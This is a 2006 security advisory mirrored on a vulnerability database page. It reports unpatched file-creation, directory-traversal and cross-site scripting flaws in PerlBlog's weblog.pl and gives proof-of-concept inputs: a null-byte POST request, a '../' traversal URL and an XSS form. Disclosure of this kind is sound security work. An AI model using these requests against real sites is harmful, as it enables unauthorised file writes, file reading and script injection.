Vulners
Lucene search
EV0081.txt
🗓️ 02 Mar 2006 00:00:00Reported by Aliaksandr HartsuyeuType 
packetstorm🔗 packetstormsecurity.com👁 27 Views
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | CVE-2006-0780 | 19 Feb 200611:00 | – | cve |
| CVE-2006-0781 | 19 Feb 200611:00 | – | cve |
| CVE-2006-0782 | 19 Feb 200611:00 | – | cve |
 | CVE-2006-0780 | 19 Feb 200611:00 | – | cvelist |
| CVE-2006-0781 | 19 Feb 200611:00 | – | cvelist |
| CVE-2006-0782 | 19 Feb 200611:00 | – | cvelist |
 | EUVD-2006-0786 | 7 Oct 202500:30 | – | euvd |
| EUVD-2006-0787 | 7 Oct 202500:30 | – | euvd |
| EUVD-2006-0788 | 7 Oct 202500:30 | – | euvd |
 | CVE-2006-0780 | 19 Feb 200611:02 | – | nvd |
10
`New eVuln Advisory:
PerlBlog Multiple Vulnerabilities
http://evuln.com/vulns/81/summary.html
--------------------Summary----------------
eVuln ID: EV0081
CVE: CVE-2006-0780 CVE-2006-0781 CVE-2006-0782
Software: PerlBlog
Sowtware's Web Site: http://www.chronicled.org/perlblog/
Versions: 1.09b 1.09 1.08 - checked
Critical Level: Dangerous
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched. No reply from developer(s)
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
-----------------Description---------------
1. Arbitrary file creation with user-defined data.
Vulnerable script: weblog.pl
User-defined post variables are not properly sanitized. "reply" parameter may contain arbitrary filename. weblog.pl creates a file with "name" and "body" parameter values included.
System access is possible.
2. Directory traversal vulnerability.
Vulnerable script: weblog.pl
Input parameter "month" isn't properly sanitized. This can be used to read arbitrary txt-files.
3. Cross-Site Scripting vulnerability.
Vulnerable script: weblog.pl
Post variables "name" and "email" are not properly sanitized. This can be used to post arbitrary HTML or JavaScript code.
--------------Exploit----------------------
Available at: http://evuln.com/vulns/81/exploit.html
1. Arbitrary file creation with user-defined data.
HTTP query example:
POST /cgi-bin/perlblog/weblog.pl HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Host: [host]
Content-Length: 124
date=02/14/2006-23:33&headerfile=200505&subject=Re: Welcome!&reply=[anyfilename]% 00&name=[anytext]&body=[anytext]&post=reply
2. Directory traversal vulnerability.
http://[host]/cgi-bin/perlblog/weblog.pl? month=../license
3. Cross-Site Scripting vulnerability.
<FORM NAME="forum" ACTION="http://[host]/cgi-bin/perlblog/weblog.pl" METHOD="POST">
<INPUT NAME="date" VALUE="02/14/2006-23:33">
<INPUT NAME="headerfile" VALUE="200505">
<INPUT NAME="subject" VALUE="Re: Welcome!">
<INPUT NAME="reply" VALUE="1">
<INPUT NAME="post" VALUE="reply">
<INPUT TYPE="TEXT" NAME="name" value='[XSS]'>
<INPUT TYPE="TEXT" NAME="email" value='">[XSS]'>
<TEXTAREA></TEXTAREA>
<INPUT TYPE="Submit" VALUE="Post Comment">
</FORM>
--------------Solution---------------------
No Patch available.
--------------Credit-----------------------
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
Regards,
Aliaksandr Hartsuyeu
http://evuln.com - Penetration Testing Services
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Mar 2006 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.05504